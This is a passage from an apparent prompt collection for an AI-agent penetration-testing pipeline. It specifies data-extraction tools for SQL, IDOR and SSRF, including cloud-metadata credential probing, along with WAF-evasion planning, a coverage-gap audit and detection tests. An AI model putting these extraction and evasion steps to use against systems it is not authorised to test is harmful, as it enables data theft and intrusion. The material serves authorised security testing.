    "accessible_ids": [1001, 1002, 1003],  # IDs that returned data
    "exposed_data_fields": ["email", "phone", "address", "order_history"],
    "estimated_exposure": "All user records accessible (enumerable sequential IDs)",
    "sample_record": {"id": 1001, "email": "re***@example.com"}  # partial redaction
}
```

**SSRF Proof Standard**:
```python
# Cloud metadata — must probe actual IMDS endpoints
{
    "vuln": "SSRF - Cloud Metadata Exposure",
    "cloud_provider": "AWS",
    "imds_accessible": True,
    "sensitive_data_found": {
        "iam_role": "production-webapp-role",
        "access_key_id": "ASIA...XXXX",  # first 4 + last 4 only
        "token_expiry": "2026-05-02T18:30:00Z"
    },
    "impact": "Full AWS API access using stolen IAM credentials"
}
```

**JWT Forgery Proof Standard**:
```python
{
    "vuln": "JWT Algorithm Confusion - None Bypass",
    "original_token_role": "user",
    "forged_token_role": "admin",
    "forged_token": "eyJ...<forged>",
    "admin_endpoint_accessed": "/api/admin/users",
    "admin_response_preview": '{"users": [...], "total": 4921}',
    "impact": "Full admin access without credentials"
}
```

### Implement Missing Extraction Logic

Review `exploitation_tools.py` and add/fix:
1. `sql_data_extraction` — must execute multi-step: fingerprint → table enum → row dump
2. `idor_data_extraction` — must iterate min 3 IDs, return all accessible data fields  
3. `ssrf_data_extraction` — must try cloud IMDS AND internal network probe (10.x.x.x:8080 common admin ports)
4. `generic_data_extract` — fallback for novel exploit types, captures response diff vs baseline

Each extraction tool must:
- Accept `max_records=5` parameter (never extract more than needed for proof)
- Redact the last 80% of sensitive values (PII, keys) — show enough to prove access, not full dump
- Return `impact_statement` string suitable for direct copy-paste into bug report
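
The redaction rule can be made mechanical so that no tool ever returns a full sensitive value. A minimal sketch, assuming a hypothetical `redact` helper that keeps the leading 20% of a string (at least one character) and masks the rest; it implements the literal "last 80%" rule rather than the email-style partial masking shown in the sample records:

```python
def redact(value: str, keep_percent: int = 20, mask: str = "*") -> str:
    """Keep the first keep_percent of the value and mask the remainder."""
    if not value:
        return value
    # Integer arithmetic avoids float rounding; always keep at least 1 char.
    keep = max(1, len(value) * keep_percent // 100)
    return value[:keep] + mask * (len(value) - keep)
```

For example, `redact("0123456789")` returns `"01********"`. Applying the helper at the point where a record is first read, rather than at report time, keeps unredacted values out of logs and intermediate results.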

Implement all changes with tests.

9. Coverage Gap & Missed Attack Surface Prompt

Use this to audit the pipeline's blind spots: what is not covered at all.

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Find the Blind Spots — What Attacks Are We Missing?

Audit all 118 tools + 8 agent configurations against the OWASP WSTG v4.2 and common bug bounty high-payout categories. Produce a gap report.

### Known WSTG Test Cases — Check Coverage

Go through each WSTG test ID and map it to an existing tool (or flag as MISSING):

WSTG-INFO-01: Conduct Search Engine Discovery      → scope_discovery_agent (robots, sitemap) ✓
WSTG-INFO-02: Fingerprint Web Server               → favicon_fingerprint_tool ✓
WSTG-INFO-03: Review Web Server Metafiles          → robots_sitemap_tool ✓
WSTG-INFO-04: Enumerate Web Server Applications    → path_enumeration_tool ✓
WSTG-INFO-05: Review Web Page Content              → js_file_analyzer ✓
WSTG-INFO-06: Identify Application Entry Points    → http_analyst ✓
WSTG-INFO-07: Map Execution Paths                  → ? (check coverage)
WSTG-INFO-08: Fingerprint Web App Framework        → ? (check coverage)
WSTG-INFO-09: Fingerprint Web App                  → ? (check coverage)
WSTG-INFO-10: Map App Architecture                 → ? (check coverage)
WSTG-CONF-01: Network/Infrastructure Config        → ? (check coverage)
WSTG-CONF-02: App Platform Config                  → ? (check coverage)
WSTG-CONF-03: File Extension Handling              → MISSING — file upload testing limited
WSTG-CONF-04: Review Backup and Unreferenced Files → scope_discovery (partial) — improve?
WSTG-CONF-05: Enumerate Infra and Admin Interfaces → MISSING — no cloud infra enumeration
WSTG-CONF-06: HTTP Methods                         → ? (are OPTIONS/PUT/DELETE tested?)
WSTG-CONF-07: HTTP Strict Transport Security       → ? (are security headers checked?)
WSTG-CONF-08: RIA Cross Domain Policy              → redirect_and_cors_tools ✓
WSTG-CONF-09: File Permission                      → MISSING
WSTG-CONF-10: Subdomain Takeover                   → dns_enumeration_tool (partial)
WSTG-CONF-11: Cloud Storage                        → s3_bucket_tools ✓
...
[Continue for all WSTG test IDs]
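
Once the mapping is filled in, the gap report itself is a small computation. A sketch under stated assumptions: the coverage map is a dict from WSTG test ID to tool name, with `None` marking a MISSING entry; `gap_report` is a hypothetical helper and the sample entries are a few rows taken from the list above.

```python
from typing import Any, Dict, Optional


def gap_report(coverage: Dict[str, Optional[str]]) -> Dict[str, Any]:
    """Split a WSTG coverage map into covered and missing test IDs."""
    covered = {test_id: tool for test_id, tool in coverage.items() if tool is not None}
    missing = sorted(test_id for test_id, tool in coverage.items() if tool is None)
    percent = round(100 * len(covered) / len(coverage), 1) if coverage else 0.0
    return {"covered": covered, "missing": missing, "coverage_pct": percent}


# Sample rows only; a real audit would list every WSTG test ID.
sample = {
    "WSTG-INFO-02": "favicon_fingerprint_tool",
    "WSTG-CONF-03": None,
    "WSTG-CONF-09": None,
    "WSTG-CONF-11": "s3_bucket_tools",
}
report = gap_report(sample)
```

Entries marked "? (check coverage)" or "partial" in the list do not fit a two-state map, so a real implementation would likely need a third status.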

### High-Payout Bug Classes NOT in Current Pipeline

Identify which of these are uncovered or only partially covered, and suggest an implementation priority for each:

1. **Subdomain Takeover** — DNS points to expired/unclaimed service (Heroku, GitHub Pages, etc.)
   - Missing: active check of CNAME targets for dangling DNS
   - Priority: HIGH (P2-P1 on most programs)

2. **File Upload RCE** — upload PHP/JSP/ASPX disguised as image
   - Current: no file upload testing module exists
   - Priority: CRITICAL

3. **Deserialization** — Java ObjectInputStream, PHP unserialize, Python pickle
   - Current: no deserialization module
   - Priority: HIGH

4. **Template Injection (SSTI)**: `{{7*7}}` → `49` in Jinja2 and Twig; FreeMarker uses `${7*7}` instead
   - Current: missing SSTI-specific tooling (fuzzing picks up some)
   - Priority: HIGH (often leads to RCE)

5. **Host Header Injection**: password reset poisoning via a spoofed Host header
   - Current: redirect_and_cors_tools covers host header injection (partial)
   - Verify: does the tool test the Host header in the password reset flow specifically?

6. **2FA/OTP Bypass** — brute force, token reuse, response manipulation
   - Current: business_logic_tools has OTP bypass partially
   - Gap: response manipulation bypass (change `"success": false` to `true`)

7. **GraphQL Subscription** — event-driven data exposure via WS-based subscription
   - Current: graphql_security_tools covers queries/mutations but not subscriptions

8. **HTTP/2 Cleartext (h2c) Upgrade**: a back-end server accepts an `Upgrade: h2c` request forwarded by the front-end proxy, so later requests can bypass proxy-level controls
   - Missing: no h2c upgrade testing

### Deliverables
For each gap identified:
1. Severity and typical bug bounty payout range
2. Minimal implementation plan (new tool class + estimated LoC)
3. Which existing agent should own the new tool
4. Sample test case showing CONFIRMED detection
5. Prioritized implementation backlog (Critical → High → Medium)

10. Full Pipeline Offensive Audit Prompt

Grand finale: a full end-to-end audit from a red teamer's perspective. Can this pipeline really be used in a real pentest operation?

[PASTE MASTER OFFENSIVE CONTEXT PROMPT FIRST]

## Mission: Full Red Team Audit of the Pentest Pipeline Itself

You are red-teaming the Pentest Crew pipeline. Not the target — the TOOL. Your job: find where the pipeline would fail, miss findings, produce false negatives, or underperform in a real engagement.

### Scenario 1: Target with Heavy WAF (Cloudflare / Akamai)
Simulate what happens when every payload is blocked with HTTP 403:
- Does `validation_executor` retry with WAF bypass variants, or give up after first blocked request?
- Does any agent detect "we're behind a WAF" and switch to stealthier payloads?
- Does stealth mode (STEALTH_MODE=true) actually help, or just add delay?
- What's the minimum payload set that would evade common WAF rule sets?

Fix: Add WAF detection logic to `burp_output_sanitizer.py` or a new `waf_detection_tool`:
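```python
import re

# (name, pattern) pairs to match against response headers, cookies, and body
WAF_INDICATORS = [
    # __cfduid was deprecated by Cloudflare in 2021; it only matches older captures
    ("cloudflare", re.compile(r"cloudflare|cf-ray|__cfduid", re.I)),
    ("akamai", re.compile(r"akamai|ak_bmsc|bm_sz", re.I)),
    # x-amzn-requestid appears on many AWS responses, so treat it as a weak signal
    ("aws_waf", re.compile(r"x-amzn-requestid|awswaf", re.I)),
    ("modsecurity", re.compile(r"mod_security|modsecurity|NOYB", re.I)),
]
# If WAF detected → switch all tools to stealth payload variants
```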
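
One way the indicator list could be applied to a response is sketched below. This is an illustration under assumptions: `detect_waf` is a hypothetical helper, and the response is assumed to be available as a header mapping plus a body string, which may not match how the pipeline actually receives Burp data. The indicator list is repeated so the sketch runs on its own.

```python
import re
from typing import Mapping, Optional

# Same indicator patterns as the list above, repeated so the sketch is self-contained.
WAF_INDICATORS = [
    ("cloudflare", re.compile(r"cloudflare|cf-ray|__cfduid", re.I)),
    ("akamai", re.compile(r"akamai|ak_bmsc|bm_sz", re.I)),
    ("aws_waf", re.compile(r"x-amzn-requestid|awswaf", re.I)),
    ("modsecurity", re.compile(r"mod_security|modsecurity|NOYB", re.I)),
]


def detect_waf(headers: Mapping[str, str], body: str = "") -> Optional[str]:
    """Return the name of the first WAF whose pattern matches, else None."""
    # Flatten header names and values into one searchable string.
    haystack = "\n".join(f"{k}: {v}" for k, v in headers.items()) + "\n" + body
    for name, pattern in WAF_INDICATORS:
        if pattern.search(haystack):
            return name
    return None
```

Because the first match wins, the order of `WAF_INDICATORS` decides the result when a response carries markers from more than one vendor.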

### Scenario 2: Target with Rate Limiting (429 after 10 requests)
- Does `fuzzing_agent` respect 429 responses and back off?
- Does `validation_executor` have any rate limiting awareness?
- Can the pipeline automatically detect rate limiting and throttle itself?

Fix needed in `burp_mcp_client.py` or tool base class:
```python
# After each call_with_retry, check response for 429
# If 429 detected: exponential backoff, max 3 retries, then mark tool as RATE_LIMITED
# Pass rate_limited flag to next tool so it knows to slow down
```
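
The backoff behaviour described in those comments could look roughly like the sketch below. It is not the signature of `call_with_retry` in `burp_mcp_client.py`: `call_with_backoff`, the zero-argument `send` callable returning a status code, and the injectable `sleep` are all assumptions made to keep the example testable.

```python
import time
from typing import Callable, Tuple

RATE_LIMITED = "RATE_LIMITED"


def call_with_backoff(
    send: Callable[[], int],
    max_retries: int = 3,
    base_delay: float = 1.0,
    sleep: Callable[[float], None] = time.sleep,
) -> Tuple[str, int]:
    """Call send() until it stops returning 429 or the retries run out.

    send is a hypothetical zero-argument callable returning an HTTP status code.
    Returns (state, last_status), where state is "OK" or RATE_LIMITED.
    """
    status = send()
    for attempt in range(max_retries):
        if status != 429:
            return "OK", status
        sleep(base_delay * (2 ** attempt))  # 1s, 2s, 4s with the defaults
        status = send()
    return ("OK" if status != 429 else RATE_LIMITED), status
```

The returned state is what a caller would pass on to the next tool as the rate-limited flag. The sketch ignores any `Retry-After` header; honouring it when present would be a natural refinement.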

### Scenario 3: Large Burp History (10,000+ requests)
- Does `http_analyst` paginate correctly through 10k requests?
- Does the regex triage logic still work at scale without LLM context overflow?
- Is there deduplication to avoid testing the same endpoint 100 times?

Check: `get_proxy_http_history` `count` and `offset` parameters — is pagination implemented?
Implement: Dedup by `(method, path, param_set)` before passing candidates to validation.
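
A minimal sketch of both steps follows, assuming each history item can be reduced to a dict with `method` and `url` keys. `fetch_page(count, offset)` is a hypothetical wrapper around `get_proxy_http_history`; the real MCP response shape may differ.

```python
from typing import Callable, Dict, Iterable, Iterator, List, Tuple
from urllib.parse import parse_qsl, urlsplit

Request = Dict[str, str]  # hypothetical shape: {"method": ..., "url": ...}


def iter_history(
    fetch_page: Callable[[int, int], List[Request]], page_size: int = 500
) -> Iterator[Request]:
    """Yield every history item, fetching page_size items per call."""
    offset = 0
    while True:
        page = fetch_page(page_size, offset)
        yield from page
        if len(page) < page_size:  # a short page means the history is exhausted
            return
        offset += page_size


def dedup_key(req: Request) -> Tuple[str, str, frozenset]:
    """Build the (method, path, param_set) key; parameter values are ignored."""
    parts = urlsplit(req["url"])
    names = frozenset(k for k, _ in parse_qsl(parts.query, keep_blank_values=True))
    return req["method"].upper(), parts.path, names


def dedup(requests: Iterable[Request]) -> List[Request]:
    """Keep the first request seen for each dedup key, preserving order."""
    seen = set()
    unique = []
    for req in requests:
        key = dedup_key(req)
        if key not in seen:
            seen.add(key)
            unique.append(req)
    return unique
```

Only query-string parameter names feed the key here. Body parameters (form or JSON) would need the same treatment before the key is reliable for POST-heavy applications.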

### Scenario 4: Authenticated Endpoints with Short-Lived Tokens
- What happens when the session token in Burp history expires mid-run?
- Does `burp_mcp_client.py` detect session expiry (401/302 to login) and alert the operator?
- Is there a mechanism to refresh tokens, or does the pipeline silently produce false negatives?

Review `detect_session_expiry()` in `burp_mcp_client.py`:
- Is it called after every request?
- Does it surface to the agent as an actionable signal, or is it silently swallowed?
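
For comparison during the review, a check of this kind might look like the sketch below. It is not the actual `detect_session_expiry()` from `burp_mcp_client.py`: the function name, the `LOGIN_PATH_HINTS` list, and the status/headers arguments are assumptions. Returning a reason string rather than a bare boolean gives the agent something actionable to report.

```python
from typing import Mapping, Optional

LOGIN_PATH_HINTS = ("/login", "/signin", "/sso")  # assumed; tune per target


def session_expiry_reason(status: int, headers: Mapping[str, str]) -> Optional[str]:
    """Return a short reason if the response looks like an expired session, else None."""
    if status == 401:
        return "401 Unauthorized"
    if status in (302, 303, 307):
        # Header names are case-insensitive, so normalize before the lookup.
        location = {k.lower(): v for k, v in headers.items()}.get("location", "")
        if any(hint in location.lower() for hint in LOGIN_PATH_HINTS):
            return f"redirect to login ({location})"
    return None
```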

### Scenario 5: Missing Findings — False Negative Rate
Design a test suite of "known-vulnerable" mock responses and check if each tool returns CONFIRMED:
```python
KNOWN_VULNERABLE_RESPONSES = {
    "sqli_error": {"body": "You have an error in your SQL syntax near '1'"},
    "sqli_blind_time": {"response_time_ms": 5200, "baseline_time_ms": 120},
    "xss_reflected": {"body": "<html>...hello <script>..."},  # payload reflected unencoded
    "ssrf_internal": {"body": "AMI ID: ami-12345678"},         # AWS IMDS response
    "idor": {"statusCode": 200, "body": '{"email": "other@user.com"}'},  # different user data
    "cmd_injection": {"body": "root:x:0:0:root:/root:/bin/bash"},  # /etc/passwd content
}

# For each known-vulnerable response, call the detection tool
# Assert: result["status"] == "CONFIRMED"
# If any returns NOT_CONFIRMED → false negative → fix detection logic
```
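
The loop described in those comments can be sketched as a small harness. The two detectors below are toy stand-ins, not the pipeline's real tools, and the 4000 ms threshold is an assumed value. The point is the shape of the check: every known-vulnerable case must come back CONFIRMED, and anything else is listed as a false negative.

```python
import re
from typing import Callable, Dict, List

Detector = Callable[[dict], str]  # returns "CONFIRMED" or "NOT_CONFIRMED"


def detect_sqli_error(resp: dict) -> str:
    """Toy detector: flags a MySQL-style syntax error in the body."""
    hit = re.search(r"error in your SQL syntax", resp.get("body", ""), re.I)
    return "CONFIRMED" if hit else "NOT_CONFIRMED"


def detect_time_delay(resp: dict, threshold_ms: int = 4000) -> str:
    """Toy detector: flags a response far slower than its baseline."""
    delta = resp.get("response_time_ms", 0) - resp.get("baseline_time_ms", 0)
    return "CONFIRMED" if delta >= threshold_ms else "NOT_CONFIRMED"


def false_negatives(cases: Dict[str, dict], detectors: Dict[str, Detector]) -> List[str]:
    """Return the names of known-vulnerable cases that were not CONFIRMED."""
    return [
        name
        for name, resp in cases.items()
        if detectors[name](resp) != "CONFIRMED"
    ]


CASES = {
    "sqli_error": {"body": "You have an error in your SQL syntax near '1'"},
    "sqli_blind_time": {"response_time_ms": 5200, "baseline_time_ms": 120},
}
DETECTORS = {"sqli_error": detect_sqli_error, "sqli_blind_time": detect_time_delay}
```

In a test suite, `assert false_negatives(CASES, DETECTORS) == []` would fail with the list of missed cases, which points directly at the detection logic that needs fixing.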

### Deliverables
For each scenario:
1. Identify specific code that fails
2. Implement the fix
3. Add a test that simulates the scenario
4. Rate the overall pipeline readiness for real engagements: 
   - Stealth against WAF: X/10
   - Rate limit handling: X/10
   - Scale (10k history): X/10
   - Session management: X/10
   - False negative rate: X/10

Final report: "This pipeline is ready for real engagements EXCEPT: [list blockers]"

⚡ Quick Reference — Prompt Combinations by Operation

| Operation | Prompt Combination |
|---|---|
| Prepare for new engagement | #1 → #9 (gap audit) → #6 (tune aggression) |
| Add new vuln class | #1 → #5 (new module) → #3 (add payloads) |
| Maximize bug bounty payout | #1 → #7 → #4 (chain builder) → #8 (exfil proof) |
| Fix pipeline blind spots | #1 → #2 (discovery) → #9 (gaps) → #5 |
| Harden against WAF | #1 → #3 (payloads) → #10 (WAF scenario) |
| Post-exploitation depth | #1 → #8 (exfil) → #4 (chain) |
| Full pipeline review | #1 → #10 (full audit) → #6 (tune agents) |

Pentest Crew — CrewAI + Burp Suite MCP multi-agent penetration testing pipeline. Use responsibly.
